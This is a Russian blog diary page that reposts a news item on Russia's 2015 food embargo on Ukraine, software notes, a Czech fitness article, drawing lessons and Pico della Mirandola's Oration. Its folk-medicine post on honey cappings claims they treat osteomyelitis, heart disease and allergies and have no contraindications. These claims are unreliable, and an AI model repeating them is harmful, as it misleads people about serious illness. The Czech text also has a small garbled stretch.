-Я - фотограф

Katsuya Yokoyama.The Art of the Shakuhachi
1 фотографий

 -Поиск по дневнику

Поиск сообщений в chooser

 -Подписка по e-mail

 

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 02.02.2010
Записей:
Комментариев:
Написано: 1202




 


Россия вводит продуктовое эмбарго в отношении Украины

Среда, 18 Ноября 2015 г. 20:21 + в цитатник

Россия вводит продуктовое эмбарго в отношении Украины

Министр экономики Алексей Улюкаев сообщил, что правительство России приняло решение с 1 января запретить импорт украинских продуктов, «поскольку Украина присоединилась к санкциям против Российской Федерации — экономическим, финансовым».

«Поскольку Украина присоединилась к санкциям против Российской Федерации — экономическим, финансовым — мы приняли решение о введении защитных мер в виде продовольственного эмбарго. Просто это решение имеет отсроченный характер», — заявил министр экономики Алексей Улюкаев, уточнив, что запрет на импорт украинских продуктов начнет действовать с 1 января.

С высокой степенью вероятности нам придется в одностороннем порядке защищать свой рынок от неконтролируемого доступа товаров через таможенную территорию Украины, товаров из третьих стран, прежде всего из стран Европейского союза
Алексей Улюкаев, министр экономики РФ

Он также отметил, что эта защита будет «прежде всего по линии введения режима наибольшего благоприятствования». «Оснований для того, чтобы сохранять нулевую ставку таможенного тарифа с Украиной, в такой ситуации мы иметь не будем», — добавил министр.

Ранее в ноябре Алексей Улюкаев уже предупреждал, что продуктовое эмбарго в отношении Украины может быть введено с Нового года. Господин Улюкаев напомнил, что 1 января вступает в силу соглашение об ассоциации Украины и ЕС.

Не наше дело — диктовать Украине и Европейскому союзу, какие соглашения заключать. Наше дело — защитить нашу экономику, наших предпринимателей, наши компании от тех рисков, которые здесь возникают. Мы, конечно, хотели бы, чтобы эти меры были приняты на многосторонней основе. Если не получится, мы примем их на односторонней основе. Есть защитный механизм отмены преференциального режима второго уровня с Украиной и введение продовольственного эмбарго
Алексей Улюкаев

В свою очередь, министр экономического развития и торговли Украины Айварас Абромавичус 11 ноября заявил, что Украина не пострадает от возможного продэмбарго России. «Мы видим, насколько Россия непредсказуемый торговый партнер. Посчитали эффект от потенциального эмбарго — дальнейшие санкции против нас уже больше ударят по самим россиянам. Поэтому ожидаемый эффект от дальнейших недружеских отношений России начинает быть минимальным», — сказал господин Абромавичус. По его словам, торговый оборот Украины с РФ уже значительно снизился — почти до 12,5% от общего объема торговли.

Алина Сабитова

Рубрики:  Государство для государства

Full Circle - журнал про Ubuntu

Четверг, 12 Ноября 2015 г. 12:07 + в цитатник


 

На Full Circle magazine russian wiki выкладываются материалы, публиковавшиеся ранее в журнале, а теперь доступные для чтения в формате wiki.

Здесь представлены номера журнала целиком, за исключением новостей, поскольку они быстро теряют свою актуальность и не подходят под формат wiki.

Мы будем рады, если вы поможете нам исправлять встреченные ошибки и опечатки в статьях, если найдёте их. Статьи может редактировать любой, кто зарегистрирован на официальном русскоязычном форуме Ubuntu http://forum.ubuntu.ru.

Вы всегда можете скачать журналы в формате pdf со страницы http://ubuntu.ru/fullcircle.

Подробней про русскоязычную версию журнала Full Circle можно узнать на странице проекта.

Архив выпусков


Рубрики:  Программное обеспечение

Метки:  

Конфиденциальность и файлы cookie

Четверг, 12 Ноября 2015 г. 12:05 + в цитатник
Заявление о конфиденциальности корпорации Майкрософт

Ваша конфиденциальность очень важна для нас. Настоящее заявление о конфиденциальности объясняет, какие личные данные мы собираем, и как используем эти данные. Это заявление относится к Bing, голосовому помощнику Cortana, MSN, Office, OneDrive, Outlook.com, Skype, Windows, Xbox и к другим службам Майкрософт, которые упомянуты в этом заявлении. При описании служб Майкрософт упоминаются веб-сайты, приложения, программное обеспечение и устройства Майкрософт.

Просим вас ознакомиться с приведенными ниже краткими сведениями и перейти по ссылке «Подробнее» для получения более детальной информации по определенным темам. Для получения дополнительной информации о конкретных службах Майкрософт воспользуйтесь приведенной ниже дополнительной информацией.

Специфические для службы подробности:


Рубрики:  Программное обеспечение

Метки:  

Забрус: лечебные свойства и польза продукта. Чем полезен медовый забрус?

Понедельник, 09 Ноября 2015 г. 15:10 + в цитатник

Забрус: лечебные свойства и польза продукта. Чем полезен медовый забрус?
 

5177462_post528631379582285 (508x413, 205Kb)

 

Забрус: лечебные свойства и польза продукта.

Чем полезен медовый забрус?

 

Альтернативная медицина рекомендует для повышения иммунитета и устранения симптомов многих заболеваний жевать забрус. Лечебные свойства этого пчелиного продукта активно использовались еще нашими предками.

 

С его помощью эффективно лечилась простуда и дезинфицировалась полость рта. А еще забрус помогал справиться с аллергией и запорами. Интересно? Читайте дальше о целебных свойствах этого уникального продукта пчеловодства.

Что такое забрус?

Продукт пчеловодства, обладающий целебными способностями, принято называть забрус. Лечебные свойства его активно применялись еще во времена Древней Руси. Новгородские летописи писали об этом продукте, включив его в список товаров, которые продавались шведам и другим народам. Грамоты утверждают, что забрус отправлялся за пределы Руси пудами.

Народы Сибири использовали для ухаживания для полостью рта этот и другие продукты пчеловодства. Забрус они жевали регулярно по несколько раз на день. Поэтому проблем с зубами у них практически не наблюдалось.

Медовый забрус получают методом срезания полоской верхней крышечки, которой запечатаны соты. Следует отметить, что данный пчелиный продукт отличается от воска своим составом.

Забрус придает меду и сотам особый специфический вкус, обладает отличным ароматом и хорошими консервирующими свойствами. Вышеуказанный пчелиный продукт отличается следующими характеристиками:

обладает приятным вкусом и ароматом;

не вызывает привыкания;

не способствует появлению дисбактериоза;

не вызывает аллергии.

Забрус: полезный состав

Альтернативная медицина рекомендует при многих заболеваниях применять пчелиный забрус.

Лечебные свойства этого продукта обусловлены его составом. Ведь в забрус входят биологически активные вещества, которые чрезвычайно полезны для организма человека и обладают многими целебными способностями. Это:

перга;

прополис;

мед;

цветочная пыльца;

секреты пчелиных слюнных желез.

Вышеперечисленные вещества отлично дополняют друг друга и производят невероятный эффект на здоровье человека.

Секреты слюнных желез пчел содержат такой уникальный компонент как лизоцим. Этот активный фермент повышает иммунитет человека. Забрус: лечебные свойства Следует отметить, что данный пчелиный продукт обладает следующими способностями:

антибактериальное действие;

антивирусная активность.

583731

Отличительной особенностью забруса является то, что он не вызывает привыкания и аллергии, в отличие от медикаментозных препаратов. В основном как жевательное средство применяется в лечебных целях забрус.

Польза его проявляется в следующих возможностях:

в механической очистке и массаже слизистой рта и десен;

в дезинфекции полости рта; в улучшении двигательной и секреторной функции кишечника и желудка;

в усиленном слюноотделении;

в нормализации кишечной микрофлоры;

в улучшении обменных процессов; в положительном влиянии на работу сердечно-сосудистой системы;

в повышении устойчивости к простуде и другим заболеваниям.

Забрус: применение

583726

Пчелиный продукт используется для терапии многих болезней в народной медицине.

Его уникальный свойства производит невероятный целебный эффект на организм.

Альтернативная медицина рекомендует использовать при лечении заболеваний опорно-двигательной системы забрус. Польза его в том, что данный продукт помогает купировать симптомы болезни, предотвращает развитие воспалительного процесса, не позволяет ему, таким образом, перейти в фазу обострения.

Еще одной отличной особенностью забруса является его способность устранять симптомы похмелья. Русские знахари рекомендуют немного его пожевать утром после ночной активной вечеринки. Забрус хорошо устраняет головные боли и повышает аппетит!

Более целебный эффект данный пчелиный продукт производит в лечении простудных заболеваний и болезней полости рта. Русские знахари рекомендуют четыре раза в день жевать забрус по 10 минут, и вышеуказанные проблемы беспокоить вас точно не будут.

Показания к применению забруса

Этот пчелиный продукт отлично справляется с симптомами следующих заболеваний:

аллергия; артрит;

остеомиелит;

проблемы опорно-двигательного аппарата;

простудные заболевания (риниты, синуситы, ОРВИ, ОРЗ, ангина, гайморит, насморк);

болезни полости рта (стоматит, пародонтоз, гингивит);

проблемы пищеварительной системы (дисбактериоз, запоры, отсутствие аппетита);

заболевания сердца и его системы; похмелье; головные боли.

Также следует отметить, что вышеуказанный пчелиный продукт используется в комплексе терапии суставной патологии и радикулита в виде лечебных аппликаций.

Лечение забрусом

 

5177462_0_a6889_74aaab63_XL (700x700, 286Kb)

Альтернативная медицина рекомендует при терапии разных заболеваний использовать вышеуказанный продукт следующим образом:

1. Для лечения запоров необходимо смешать одинаковое количество забруса с медом. Съедать по одной столовой ложке в день этой смеси.

2. Для устранения симптомов гайморита и ринита (во время обострения заболеваний) жевать данный продукт в количестве 1 ст. ложки в течение 2-3 суток каждый час по 15 минут. Для профилактики этих болезней достаточно осуществлять этот процесс 1-2 раза в сутки на протяжении нескольких дней.

3. Для терапии аллергических реакций рекомендуется жевать забрус следующим образом: при легком поллинозе – 2 недели перед началом цветения растения; при умеренных симптомах сенной лихорадки – за 2 дня по 5 раз в сутки, а потом каждые 8 часов в течение всего неблагоприятного периода;

при сильных признаках аллергического заболевания русские знахари рекомендуют за 3 месяца до цветения растения употреблять после еды чайную ложку меда. Примерно за 2 недели до неблагоприятного периода показано применение 2-х чайных ложек меда с 2-мя чайными ложками яблочного уксуса. Употреблять на ночь. Кроме того, во время всего процесса лечения активно жевать забрус (минимум 4 раза в неделю). Таким методом доктор Д. С. Джарвис вылечил пациента от сильной сенной лихорадки без применения каких-либо медикаментозных препаратов.

583728

Противопоказания к применению забруса

Следует отметить, в основном не приносят вреда здоровью человека продукты пчеловодства. Забрус не является исключением. Он не имеет особых противопоказаний. Только в случае индивидуальной непереносимости его компонентов следует прекратить лечение.

Что интересно, даже детям в лечебных целях можно применять забрус пчелиный. Польза его особенно велика в период простудных заболеваний. Детишкам следует жевать описанный продукт, и тогда проблем с иммунитетом возникать не будет. Также русские знахари утверждают, передозировка данным продуктом практически невозможна. Даже если вы по неосторожности проглотили несколько кусочков – это не принесет вреда. Наоборот, для желудка пчелиный забрус – настоящая находка. Он очистит его от шлаков. Продукт является отличным средством для лечения многих заболеваний. Но прежде чем использовать его в таких целях, нужно получить консультацию от опытного специалиста.

 

СПАСИБО Н Филина

Рубрики:  Практические рекомендации

Метки:  

Restart života

Воскресенье, 08 Ноября 2015 г. 20:55 + в цитатник

Rozpohybujte své tělo krok za krokem

fit-runKaždý z nás se chce v oblasti zdraví cí !@#$%^&* dobře, ale málokdo z nás se pravidelně hýbe. Přináším vám v dnešním článku praktický a hlavně dlouhodobě účinný návod, jak na to. Mně osobně, i mým klientům, se osvědčil systém, kterému říkám 3P. Jedná se kombinaci psychiky, pohybu a potravy.

 

Pokud se nám podaří zvítězit v těchto třech péčkách, máme v oblasti zdraví nadobro vyhráno. V dnešním článku se pojďme zaměřit na pohyb, který pro někoho může být hračkou a někdo zde může pěkně trpět. Jak se tedy rozpohybovat a najít si tu správnou pohybovou aktivitu?

 

Krok # 1 – Začněte od základu

Pokud si myslíte, že řešením je dřina v posilovně nebo na Zumbě, budu vás muset vyvést z omylu. Čím déle se pohybem zabývám, tím více jsem přesvědčená o tom, že to nejdůležitější je v tom nejjednoduším. A zároveň, když nezvládneme jednoduché, nemůžeme očekávat pokroky ve složitějším. Tak tedy – primárně se musíte naučit správně chodit a stát. Možná to zní komicky, ale jak dokazují mnohé vědecké studie, díky špatné klenbě nohou naše tělo nemůže optimálně fungovat (z hlediska pohybu a motoriky), vznikají tak bolesti zad, kloubů a naše tělo začne mít takzvané disbalance (jedna noha delší, křivě postavená ramena apod.). Než se tedy rozhýbete, ujistěte se, že máte zdravou klenbu a umíte správně chodit. K tomu vám pomůže zdravotní cvičení nebo takzvaný SM Systém (více na www.smsystem.cz )

 

Krok # 2 – Rozhýbejte pánev a správně dýchejte

Pokud se naučíte pracovat s klenbou a správnou chůzí, můžete se zaměřit na své pánevní dno (i vy pánové) a správné dýchání. Pokud dokážete kontrolovat správné držení a funkčnost pánevního dna, automaticky posílíte svalstvo pro fungování vašich citlivých orgánů, zapojíte potřebné svalstvo pro lepší držení celého těla. Mohu vám doporučit literaturu o pánevním dnu, anebo si vyhledejte trenéra se specializací. Kromě pánevního dna je pro náš život i správné cvičení obyčejné dýchání. Zkuste sebe pozorovat ve všedním dnu, jak dýcháte? Mělce, útržkovitě, nebo.. dýcháte vůbec? Naše dýchání je obrazem našeho psychického aktuálního stavu, někdy nám ale vědomé dýchání může pomoci k tomu, abychom se cítili lépe, uklidnili se. Pokud chcete váš dech zvládat, začněte praktikovat jógu, která je v tomto ohledu nejlepším učitelem.

 

Krok # 3 – Začněte praktikovat jednoduché aktivity

Když máte zvládnutý základ, můžete se s radostí pustit do vybírání aktivit. Ty by měly být zábavné, zdravé a neměly by vám pro začátek zabrat moc času. Je lepší na sobě pracovat každý den, i když dvacet minut, než jít cvičit jednou týdně na hodinu. Pro začátek vám mohu doporučit rychlou chůzi, lehký běh (ale skutečně lehký!), jednoduché posilovací cviky na doma, plavání, jógu nebo SM systém. Prvním úkolem pro vás bude, abyste si navykli něco dělat .

 

Krok # 4 – Vyberte si aktivity, které splní vaše očekávání

Váš pohyb by se podle předních odborníků měl skládat ze 4 aktivit – aerobní, posilovací, protahovací a zábavné. Pokud se vám podaří splnit takové požadavky, zaručíte vlastnímu tělu skvělé zázemí pro zdraví a dlouhověkou ohebnost. Mně osobně se osvědčil systém cvičení na power plate s kombinací cviků v SM systému a jógou. Pro zábavu mám na léto kolo a brusle, v zimě procházky se psem, lyže a běžky. Věřím, že každý si svou cestu umí najít. Stačí zkoušet a nevzdávat to.


Серия сообщений "Чехия":
Часть 1 - Jožin z bažin
Часть 2 - Jozin z bazin, или Последние дадаисты Европы
...
Часть 11 - Bez spravedlnosti nebude mír
Часть 12 - Jako naschvál
Часть 13 - Restart života

Рубрики:  Практические рекомендации

Метки:  

Как руссифицировать Sony Vegas Pro 11, 12, 13

Среда, 21 Октября 2015 г. 21:50 + в цитатник
В колонках играет - Прощание Славянки
Настроение сейчас - бодрое

1445453104_Russifikaciya_Sony_Vegas_Pro (700x515, 85Kb)

Я руссифицировал Sony Vegas Pro 13 и у меня в реестре не было третьей ветки. Первоначально был установлен английский язык и во всех ветках было указано значение 409.


Рубрики:  Программное обеспечение

Метки:  

Простые уроки рисования для начинающих. (Избранное)

Среда, 07 Октября 2015 г. 17:02 + в цитатник
Это цитата сообщения alona777 [Прочитать целиком + В свой цитатник или сообщество!]

Простые уроки рисования для начинающих. (Избранное)

 

Простые уроки рисования для начинающих. (Избранное)

Автор: Мазовецкая В. В.

 

Если желание создавать собственную Вселенную на листе бумаги. Если возможность повторить карандашом окружающий мир — еще один повод выразить ему свое восхищение.

 

 

И бросьте думать, что рисование — это для избранных. Научились же вы ходить. А ведь когда-то не умели. Научились же вы писать, к тому же в собственной манере, неповторимым почерком.

И неважно, насколько хороши будут ваши рисунки вначале. Это не имеет никакого значения: как только вы взяли карандаш в руки, вы стали богом. Творцом собственной реальности. Я же, как автор этой книги, постараюсь вам объяснить все настолько просто, насколько понимаю этот процесс сейчас, рисуя более 30 лет. Поверьте, все намного интереснее, чем может показаться. И не нужно бояться ошибок и неудач — они наши верные учителя и наилучшие помощники. Храните свои первые рисунки, нарисованные благодаря этой книге. Через несколько лет они будут для вас бесценны.

… Уроки рисования / шаг за шагом …
Рубрики:  Расширяя кругозор

Метки:  

РЕЧЬ О ДОСТОИНСТВЕ ЧЕЛОВЕКА

Вторник, 06 Октября 2015 г. 17:42 + в цитатник

Джованни Пико делла Мирандола

РЕЧЬ О ДОСТОИНСТВЕ ЧЕЛОВЕКА

Перевод Л.Брагиной

Я прочитал, уважаемые отцы, в писании арабов, что когда спросили Абдаллу Сарацина, что кажется ему самым удивительным в мире, то он ответил, что ничего нет более замечательного, чем человек. Этой мысли соответствуют и слова Меркурия: "О Асклепий, великое чудо есть человек!" Когда я размышлял о значении этих изречений, меня не удовлетворяли те многочисленные аргументы в пользу превосходства человеческой природы, которые приводят многие: человек есть посредник между всеми созданиями, близкий к высшим и господин над низшими, истолкователь природы в силу проницательности ума, ясности мышления и пытливости интеллекта, промежуток между неизменной вечностью и текущим временем, узы мира, как говорят персы, Гименей, стоящий немного ниже ангелов, по свидетельству Давида.

Все это значительно, но не главное, что заслуживает наибольшего восхищения. Почему же мы не восхищаемся в большей степени ангелами и прекрасными небесными хорами? В конце концов, мне показалось, что я понял, почему человек является самым счастливым из всех живых существ и достойным всеобщего восхищения и какой жребий был уготован ему среди всех прочих судеб, завидный не только для животных, но для звезд и потусторонних душ. Невероятно и удивительно! А как же иначе? Ведь именно поэтому человека по праву называют и считают великим чудом, живым существом, действительно достойным восхищения. Но что бы там ни было, выслушайте, отцы, и снисходительно простите мне эту речь.

Уже всевышний Отец, Бог-творец создал по законам мудрости мировое обиталище, которое нам кажется августейшим храмом божества. Наднебесную сферу украсил разумом, небесные тела оживил вечными душами. Грязные и засоренные части нижнего мира наполнил разнородной массой животных. Но, закончив творение, пожелал мастер, чтобы был кто-то, кто оценил бы смысл такой большой работы, любил бы ее красоту, восхищался ее размахом. Поэтому, завершив все дела, как свидетельствуют Моисей и Тимей, задумал, наконец, сотворить человека. Но не было ничего ни в прообразах, откуда творец произвел бы новое потомство, ни в хранилищах, что подарил бы в наследство новому сыну, ни на скамьях небосвода, где восседал сам созерцатель вселенной. Уже все было завершено; все было распределено по высшим, средним и низшим сферам. Но не подобало отцовской мощи отсутствовать в последнем потомстве, как бы истощенной, не следовало колебаться его мудрости в необходимом деле из-за отсутствия совета, не приличествовало его благодетельной любви, чтобы тот, кто в других должен был восхвалять божескую щедрость, вынужден был осуждать ее в самом себе. И установил, наконец, лучший творец, чтобы для того, кому не смог дать ничего собственного, стало общим все то, что было присуще отдельным творениям. Тогда принял Бог человека как творение неопределенного образа и, поставив его в центре мира, сказал: "Не даем мы тебе, о Адам, ни определенного места, ни собственного образа, ни особой обязанности, чтобы и место, и лицо и обязанность ты имел по собственному желанию, согласно твоей воле и твоему решению. Образ прочих творений определен в пределах установленных нами законов. Ты же, не стесненный никакими пределами, определишь свой образ по своему решению, во власть которого я тебя предоставляю. Я ставлю тебя в центре мира, чтобы оттуда тебе было удобнее обозревать все, что есть в мире. Я не сделал тебя ни небесным, ни земным, ни смертным, ни бессмертным, чтобы ты сам, свободный и славный мастер, сформировал себя в образе, который ты предпочтешь. Ты можешь переродиться в низшие, неразумные существа, но можешь переродиться по велению своей души и в высшие божественные. О, высшая щедрость Бога-отца! О высшее и восхитительное счастье человека, которому дано владеть тем, чем пожелает, и быть тем, чем хочет! Звери, как только рождаются, от материнской утробы получают все то, чем будут владеть потом, как говорит Луцилий. Высшие духи либо сначала, либо немного спустя становятся тем, чем будут в вечном бессмертии. Рождающемуся человеку Отец дал семена и зародыши разнородной жизни и соответственно тому, как каждый их возделает, они вырастут и дадут в нем свои плоды. И если зародыши растительные, то человек будет растением, если чувственные, то станет животным, если рациональные, то сделается небесным существом, а если интеллектуальные, то станет ангелом и сыном Бога. А если его не удовлетворит судьба ни одного из творений, то пусть возвратится к центру своего единообразия и, став единым с Богом-духом, пусть превосходит всех в уединенной мгле Отца, который стоит над всем. И как не удивляться нашему хамелеонству! Или вернее – чему удивляться более? И справедливо говорил афинянин Асклепий, что за изменчивость облика и непостоянство характера он сам был символически изображен в мистериях как Протей. Отсюда и известные метаморфозы евреев и пифагорейцев. Ведь в еврейской теологии то святого Эноха тайно превращают в божественного ангела, то других превращают в иные божества. Пифагорейцы нечестивых людей превращают в животных, а если верить Эмпедоклу, то и в растения. Выражая эту мысль, Магомет часто повторял: "Тот, кто отступит от божественного закона, станет животным и вполне заслуженно". И действительно, не кора составляет существо растения, но неразумная и ничего не чувствующая природа, не кожа есть сущность упряжной лошади, но тупая и чувственная душа, не кругообразное существо составляет суть неба, а правильный разум; и ангела создает не отделение его от тела, но духовный разум.

Если ты увидишь кого-либо, ползущего по земле на животе, то ты видишь не человека, а кустарник, и если увидишь подобно Калипсо кого-либо, ослепленного пустыми миражами фантазии, охваченного соблазнами раба чувств, то это ты видишь не человека, а животное. И если ты видишь философа, все распознающего правильным разумом, то уважай его, ибо небесное он существо, не земное. Если же видишь чистого созерцателя, не ведающего плоти и погруженного в недра ума, то это не земное и не небесное существо. Это – самое возвышенное божество, облаченное в человеческую плоть. И кто не будет восхищаться человеком, который в священных еврейских и христианских писаниях справедливо называется именем то всякой плоти, то всякого творения, так как сам формирует и превращает себя в любую плоть и приобретает свойства любого создания! Поэтому перс Эвант, излагая философию халдеев, пишет, что у человека нет собственного природного образа, но есть много чужих внешних обликов. Отсюда и выражение у халдеев: человек – животное многообразной и изменчивой природы. Но к чему все это? А для того, чтобы мы понимали с тех пор, как родились (при условии, что будем тем, чем мы хотим быть), что важнейший наш долг заботиться о том, чтобы по крайней мере о нас не говорили, что когда мы были в чести, то нас нельзя было узнать, так как мы уподобились животным и глупым ослам. Но лучше, чтобы о нас говорили словами пророка Асафа: "Вы – Боги и все – знатные сыновья". Мы не должны вредить себе, злоупотребляя милостивейшей добротой Отца, вместо того, чтобы приветствовать свободный выбор, который он нам дал.

В душу вторгается святое стремление, чтобы мы, не довольствуясь заурядным, страстно желали высшего и, по возможности, добивались, если хотим, того, что положено всем людям. Нам следует отвергнуть земное, пренебречь небесным и, наконец, оставив позади все, что есть в мире, поспешить в находящуюся над миром курию, самую близкую к высочайшей божественности.

...Но ведь, если необходимо строить нашу жизнь по образу херувимов, то нужно видеть, как они живут и что делают. Но так как нам, плотским и имеющим вкус с мирскими вещами, невозможно этого достичь, то обратимся к древним отцам, которые могут дать нам многочисленные верные свидетельства о подобных делах, так как они им близки и родственны. Посоветуемся с апостолом Павлом, ибо когда он был вознесен на третье небо, то увидел, что делало войско херувимов. Он ответил нам, что они очищаются, затем наполняются светом и, наконец, достигают совершенства, как передает Дионисий. Так и мы, подражая на земле жизни херувимов, подавляя наукой о морали порыв страстей и рассеивая спорами тьму разума, очищаем душу, смывая грязь невежества и пороков, чтобы страсти не бушевали необдуманно и не безумствовал иногда бесстыдный разум. Тогда мы наполним очищенную и хорошо приведенную в порядок душу светом естественной философии, чтобы затем совершенствовать ее познанием божественных вещей.

Не довольствуясь нашими святыми отцами, посоветуемся с патриархом Яковом, чье изваяние сияет на месте славы. И мудрейший отец, который спит в подземном царстве и бодрствует в небесном мире, дает нам совет, но символически – как это ему свойственно. Есть лестница, – скажет он, – которая тянется из глубины земли до вершины неба и разделена на множество ступенек. На вершине этой лестницы восседает господь; ангелы-созерцатели то поднимаются, то спускаются по ней. И если мы, страстно стремясь к жизни ангелов, должны добиться этого, то, спрашиваю, кто посмеет дотронуться до лестницы Господа грязной ногой или плохо очищенными руками? Как говорится в мистериях, нечистому нельзя касаться чистого.

Но каковы эти ноги и эти руки? Ноги души – это, несомненно, та презреннейшая часть, которая опирается как на всю материю, так и на почву земли, питающая и кормящая сила, горючий материал страстей, наставница дающей наслаждение чувственности. А рука души, защитница страстей – почему мы не говорим о ней с гневом? – сражается за нее и под солнцем и пылью, эта хищница отнимает то, чем сонная душа наслаждается в тени. Эти руки и ноги, то есть всю чувственную часть, в которой заключен соблазн тела, как говорят, силой пленяющий душу, мы, словно в реке, омываем в философии морали, чтобы нас не сбросили с лестницы как нечестивых и греховных. Однако этого не достаточно, если мы захотим стать спутниками ангелов, носящихся по лестнице Якова, но не будем заранее хорошо подготовлены и обучены двигаться от ступеньки к ступеньке, как положено, – никогда не сворачивая с пути и не мешая друг другу. А когда мы достигнем этого красноречием или способностями разума, то, оживленные духом херувимов, философствуя в соответствии со ступенями лестницы, то есть природы, все проходя от центра к центру, будем то спускаться, расщепляя с титанической силой единое на многие части, как Озириса, то подниматься, соединяя с силой Феба множество частей в единое целое, как тело Озириса, до тех пор, пока не успокоимся блаженством теологии, прильнув к груди Отца, который восседает на вершине лестницы. Спросим у справедливого Иова, который заключил с Богом договор о жизни, прежде чем сам вступил в жизнь: "Кого больше всего желает высший Бог из миллионов ангелов, которые ему помогают?". "Конечно, мира"- ответит Бог согласно тому, как читается: "Того, который творит мир на небесах". И так как средний ряд передает предписания высшего ряда низшему, то для нас слова теолога Иова объясняет философия Эмпедокла, который указывает на двойную природу нашей души – одна поднимает нас вверх, к небесам, другая сбрасывает вниз, в преисподнюю, – и сравнивает это с враждой и дружбой или с войной и миром, как свидетельствуют его песни. Сам Иов жалуется, что он, как безумный, жил во вражде и раздоре, был изгнан Богами и сброшен в пропасть.

Ведь, действительно, множество разногласий есть среди нас, отцы! Дома у нас идет тяжелая междоусобная распря и гражданская война. Если бы мы захотели, если бы страстно пожелали такого мира, который поднял бы нас так высоко, что мы оказались бы среди возвышенных Господа, то единственное, что успокоило бы и обуздало нас вполне, – это философия морали. И если бы человек добился у врагов только перемирия, то обуздал бы дикие порывы и гневный пыл льва. И если, заботясь о себе, мы пожелали бы тогда вечного мира, то он наступил бы, обильно утолив наши желания, заключил бы между телом и духом договор о священном мире, принеся в жертву пару животных.

Диалектика успокоит разум, который мучается из-за словесных противоречий и коварных силлогизмов. Естественная философия уймет споры и борьбу мнений, которые угнетают, раскалывают и терзают беспокойную душу, но при этом заставит нас помнить, что природа, согласно Гераклиту, рождена войной и поэтому названа Гомером борьбой. Поэтому невозможно найти в природе настоящего покоя и прочного мира, который является привилегией и милостью ее госпожи – святейшей теологии. Теология укажет нам путь к миру и поведет как провожатый. Издали увидев нас, спешащих, она воскликнет: "Подойдите ко мне, вы, которые находитесь в затруднении, подойдите ко мне, и я дам вам мир, который не могут вам дать ни вселенная, ни природа!". И мы, ласково позванные и так радушно приглашенные, с окрыленными, как у Меркурия, ногами устремился в объятия благословенной матери, насладимся желаемым миром – святейшим миром, неразрывными узами и согласной дружбой, благодаря которой все души не только согласованно живут в едином разуме, который выше всех разумов, но некоторым образом сливаются в единое целое.

Такая дружба, как говорят пифагорейцы, являются целью всей философии; такой мир Бог устанавливает в своих высотах, а ангелы, сходящие на землю, сообщают о нем людям доброй воли, чтобы благодаря ему люди, восходящие на небо, сами стали ангелами. Такой мир мы пожелали бы друзьям, нашему времени, каждому дому, в который бы мы вошли, и нашей душе, чтобы она стала благодаря ему местом пребывания Бога и после того, как уничтожит на себе грязь с помощью морали и диалектики, украсилась [бы] многообразной философией, как дворцовой пышностью.

Вершину входа душа увенчает гирляндами теологии, и тогда вместе с Отцом сойдет король славы и сделает в ней свое пристанище. Душа окажется достойной столь снисходительного гостя. Отделанная золотом, как свадебная тога, окруженная многообразием мыслей, она примет выдающегося гостя даже не как гостя, а как нареченного, с которым никогда не разлучаются, и пожелает отделиться от своего народа и, забыв дом своего отца и даже себя, пожелает умереть в себе самой, чтобы жить в нареченном, в присутствии которого смерть его святых поистине блаженна. Я говорю – смерть, если следует назвать смертью полноту жизни, размышление над которой является занятием философии, как говорили мудрецы. Давайте позовем самого Моисея, который лишь немного меньше обильного источника священной и невыразимой мысли, откуда ангелы пьют свой нектар: Выслушаем же судью, который должен прийти к нам и объявить тем, кто живет в пустынном одиночестве плоти, следующие законы: те, кто еще греховен, нуждаются в морали, поэтому пусть живут с людьми не в святилище, а под открытым небом, как жрецы фессалийские, пока не очистятся от грехов. Те же, кто уже упорядочил образ жизни и принят в храм, пусть не приобщаются к священнодействию, но прежде усердно послужат таинствам философии диалектическим послушничеством; и допущенные, наконец, к таинствам в звании жреца философии пусть созерцают то пышный многоцветный звездный наряд всевышнего Бога – царя, то голубой семисвечник, чтобы потом, принятые в лоно храма за заслуги возвышенной теологии, наслаждались славой господней, когда уже никакое покрывало не скрывает образа Бога.

Да, Моисей приказывает нам это, но приказывая, убеждает нас и побуждает к тому, чтобы мы с помощью философии готовились к будущей небесной славе. Но в действительности же не только христианские и моисеевские таинства, но и теология древних, о которой я намереваюсь спорить, раскрывает нам успехи и достоинство свободных искусств. Разве иного желают для себя посвященные в греческие таинства? Ведь первый из них, кто очистится с помощью морали и диалектики – очистительных занятий, как мы их называем, – будет принят в мистерии! Но чем иным может быть это [участие в мистериях], если не разъяснением тайн природы посредством философии? Только после того, как они были таким образом подготовлены, наступило видение божественных дел через свет теологии.

*   *   *

И кто не стал бы добиваться посвящения в эти таинства? Кто, пренебрегая всем земным, презирая дары судьбы, не заботясь о теле, не пожелал бы стать сотрапезником Богов, еще живя на земле и получив дар бессмертия, напоив нектаром себя – смертное существо! Кто не захотел бы так быть завороженным платоновским "Федром" и так воодушевиться экстазом Сократа, чтобы бежать из этого мира, вместилища дьявола, взмахами крыльев и ног и достигнуть быстро небесного Иерусалима! Мы будем возбуждаться, отцы, восторгами Сократа, которые настолько выводят нас за пределы рассудка, что возносят нас и наш разум к Богу. Они тем более будут возбуждать нас, если мы сами приведем сначала в движение то, что есть в нас самих. И действительно, если с помощью морали силы страсти будут напряжены до соответствующих разумных пределов, так чтобы они согласовывались между собой в нерушимой гармонии, если с помощью диалектики будет развиваться разум, то, возбужденные пылом Муз, мы будем упиваться небесной гармонией. Тогда вождь Муз Вакх в своих таинствах – зримых проявлениях природы – раскрывая нам, ставшим философами, тайны Бога, напитает нас из богатств Божьего дома, в котором мы вдохновимся двойным пылом, сближаясь со священной теологией, если будем верными, как Моисей. И когда поднимемся на самую высокую вершину, то сопоставляя в вечности все, что было, есть и будет, и созерцая первородную красоту, мы станем прорицателями Феба, его крылатыми поклонниками, и тогда, как порывом возбужденные невыразимой любовью, подобно окружающим нас пылким серафимам, мы, полные божеством, станем теперь тем, кто нас создал.

Если кто-либо будет исследовать значение и тайный смысл священных имен Аполлона, то увидит, что они свидетельствуют о том, что Бог является философом не менее, чем прорицателем.

И то, что Аммоний достаточно полно рассказал об этом, не вынуждает меня по-иному это трактовать. О, отцы, пусть овладеют душой три дельфийские правила, необходимые особенно тем, кто намеревается войти в святейший и августейший храм не ложного, но истинного Аполлона, который озаряет всякую душу, входящую в этот мир! Вы увидите, что нас вдохновляло только то, что мы все силы посвятили изучению тройственной философии, о которой сейчас идет спор. Знаменитое "ничего слишком" справедливо предписывает норму и правило всякой добродетели, согласно критерию меры, о чем говорит этика. Знаменитое "познай самого себя" побуждает и вдохновляет нас на познание всей природы, с которой человек связан почти брачными узами. Тот же, кто познает самого себя, все познает в себе, как писали сначала Зороастр, а затем Платон в "Алкивиаде"...

